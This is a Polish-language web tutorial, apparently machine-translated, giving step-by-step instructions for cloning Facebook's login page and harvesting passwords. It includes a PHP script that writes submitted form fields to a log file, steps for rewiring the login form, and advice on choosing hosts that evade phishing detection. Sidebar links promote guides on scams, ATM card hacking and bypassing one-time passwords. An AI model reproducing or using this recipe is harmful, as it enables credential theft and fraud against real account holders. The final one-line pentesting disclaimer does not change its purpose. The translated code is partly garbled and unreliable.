spis treści
Jak utworzyć łącze phishingowe na Facebooku
ostatnio natknąłem się na wiele przewodników na temat tworzenia stron phishingowych. Chociaż zasady leżące u podstaw każdego przewodnika są podobne, większość rozwiązań hostingowych zawartych w przewodniku nie działa już ze względu na wzrost liczby stron phishingowych przez firmy hostingowe. W tym przewodniku przejdę przez każdy krok niezbędny do stworzenia i hostowania wybranej strony phishingowej. Smacznego!
Pobierz indeks HTML docelowej strony internetowej
aby rozpocząć, musisz uzyskać indeks HTML strony. Istnieją różne metody robienia tego, istnieją nawet szablony online dla popularnych witryn. W tym samouczku zamierzam użyć najbardziej podstawowego sposobu, aby być jak najbardziej przyjaznym dla noob.
Czytaj także: jak stworzyć stronę phishingową za pomocą kali linux
przejdź do swojej strony
w tym samouczku zamierzam phishować Facebooka.
Zobacz Źródło strony.
w zależności od przeglądarki mogą być różne metody. Zwykle odbywa się to poprzez kliknięcie prawym przyciskiem myszy na stronie i kliknięcie „Zobacz źródło”. Zrobiłem to w przeglądarce i Windows powinien wyjść podobny do tego:
w polu po prawej stronie znajduje się źródło strony internetowej. Co prowadzi do następnego kroku:
pobieranie i zapisywanie kodu źródłowego
zaznacz pole i skopiuj i wklej wszystko w polu do dokumentu txt. Użyj notatnika w systemie windows i prostego programu do edycji tekstu, jeśli nie używasz systemu windows. (Nie używaj programów takich jak Word lub Pages, ponieważ jest bardzo powolny). Po wykonaniu tej czynności kliknij „Zapisz jako” lub inną opcję, która pozwala zapisać ten dokument. Na notatniku powinno to wyglądać tak:
Zmień „Zapisz jako typ” na wszystkie pliki i zmień kodowanie na Unicode.
następnie nazwij dokument ” indeks.html”, oczywiście bez znaków mowy.
Gratulacje! Ukończyłeś pierwszy krok tutoriala!
Czytaj: Jak zrobić oszustwo na Facebooku bez zbanowania lub zablokowania
Lekcja 2
Tworzenie pliku PHP do zbierania haseł
plik PHP jest w zasadzie narzędziem, które zbiera hasło użytkowników w tym scenariuszu. Istnieje kilka sposobów tworzenia tego PHP, jeśli masz jakąś wiedzę programistyczną, ale jeśli nie, po prostu skopiuj mój przykład PHP.
<?php
header (’lokalizacja: facebook.com’);
$handle = fopen („log.txt”,”a”);
foreach ($_POST as $ zmienna => $ wartość) {
fwrite ($uchwyt, $zmienna);
fwrite ($handle, „=”);
fwrite ($handle, $value);
fwrite ($handle, „\r\n”);
}
fwrite ($handle, „\R\n\n\n\n”);
fclose ($handle);
wyjście;
?>
podobnie jak powyżej, zapisz plik PHP jako ” wszystkie pliki „i jako” post.php”. Zmień kodowanie na Unicode i powinieneś być gotowy do pracy!
zmodyfikuj plik HTML strony, aby włączyć do niego plik PHP.
teraz musimy włączyć nasz plik PHP, aby otrzymać hasła wysyłane przez użytkowników.
Znajdź metodę wysyłania hasła
najpierw musisz zobaczyć, jak działa strona internetowa, gdy użytkownik przesyła nazwę użytkownika-hasło.
w przypadku Facebooka wszystko, co musisz zrobić, to Ctrl-F i wpisać „=akcja” w polu.
teraz musisz zamienić wszystko w podkreślonej części na ” post.php”, zachowaj znaki mowy. (tylko jeden zestaw proszę).
oczywiście ta metoda będzie inna dla innych stron internetowych. Dobrym sposobem na znalezienie go jest użycie narzędzia Inspect Elements w większości nowoczesnych przeglądarek i kliknięcie przycisku logowania. Znajdź coś podobnego do powyższej metody.
Czytaj także: dowiedz się, jak włamać karty bankomatowe, maszyny za pomocą oprogramowania Wizcardo
uwaga: musisz to zmienić później, gdy faktycznie hostujesz stronę.
Hosting pliku PHP do przechowywania haseł
Teraz jest soczysta część, dzięki której twoja fałszywa strona internetowa jest online, aby inni mogli ją przeglądać.
możesz używać dowolnych darmowych usług hostingowych do hostowania i przechowywania haseł. Jednak plan hostingowy musi zawierać coś o nazwie „FTP”. W tym samouczku będę używał 000webhost.
przejdź do serwera FTP dla swojej usługi hostingowej
w tym kroku zakładam, że utworzyłeś już witrynę z usługą hostingową.
w przypadku 000webhost po prostu kliknij ” Menedżer plików „i kliknij”Prześlij pliki”. Oto zdjęcie serwera FTP dla 000webhost:
Ignoruj inne pliki, to tylko niektóre z moich osobistych rzeczy, niezwiązanych z tym tutorialem.
Prześlij swoje pliki PHP i zmień uprawnienia
jak widzisz, już przesłałem swój plik PHP. Ale musisz po prostu przesłać go do głównego folderu serwera FTP. (Niektóre serwery FTP nie pozwalają na przesyłanie do folderu głównego, wystarczy postępować zgodnie z ich szczegółowymi instrukcjami).
teraz musisz zmienić pozwolenie na „777”, co jest w zasadzie każdym pozwoleniem. Gdy pojawi się monit o zaznaczenie pól uprawnień, po prostu zaznacz wszystkie.
teraz możesz zamknąć serwer FTP. Zapisz swój adres internetowy!
Czytaj także: instrukcje krok, aby ominąć weryfikację OTP na dowolnych stronach internetowych
Hosting rzeczywista strona phishingowa
w tym kroku musisz użyć dokładnego dostawcy hostingu, którego używam, w przeciwnym razie zostaniesz zbanowany.
istnieje powód, dla którego nie używam tego samego dostawcy hostingu dla mojej rzeczywistej strony, a to dlatego, że większość dostawców hostingu będzie zatrudniać jakiś rodzaj skanowania w celu wykrycia stron phishingowych. Mogę wypróbować wiele usług hostingowych w przeszłości i wszystkie z nich zbanowały mnie w ciągu 30 minut od przesłania pliku indeksu.
Konfigurowanie posta.forum php
zanim hostujesz stronę, pamiętaj o wpisie.formularz php / login co skonfigurowaliśmy powyżej?
musisz ponownie znaleźć formularz logowania w swoim indeksie.html i zastąpić ” post.php ” z ” http://yourwebsiteforyourpostphpupload/post.php”, zakładając, że przesłałeś do folderu głównego. Pamiętaj, aby dodać http: / /przed stroną. Aby to przetestować, przejdź do strony (http://yourwebsiteforyourpostphpupload/post.php) i sprawdź, czy nie przekierowuje Cię na Facebooka.com, jeśli tak, to wkleiłeś właściwą stronę. Jeśli nie, sprawdź dokładnie, czy przesłałeś plik do właściwego katalogu.
Hosting strony
przejdź do htmlpasta.com. zobaczysz coś podobnego do tego:
następnie musisz skopiować indeks.plik html dla Twojej witryny phishingowej i wklej go tutaj.
teraz kliknij na re i kliknij Wklej, otrzymasz link do swojej strony.
Podsumowanie
Gratulacje! Zakończyłeś hosting swojej pierwszej strony phishingowej! Przejdź do swojej witryny i spróbuj wprowadzić fałszywe dane logowania, po kliknięciu przycisku logowania powinien przekierować cię do facebook.com. Zaloguj się do serwera FTP, na którym hostowałeś swój post.plik php i powinien być nowy dokument o nazwie Log.txt, który jest przechowywany w tym samym folderze co twój post.plik php. Wszelkie dane logowania powinny być tam przechowywane.
Czytaj: 2020 yahoo format yahoo, format rozliczeniowy, Pobierz pdf
nie używaj tego do złośliwych celów, używaj tylko do testów penetracyjnych i za zgodą ofiary.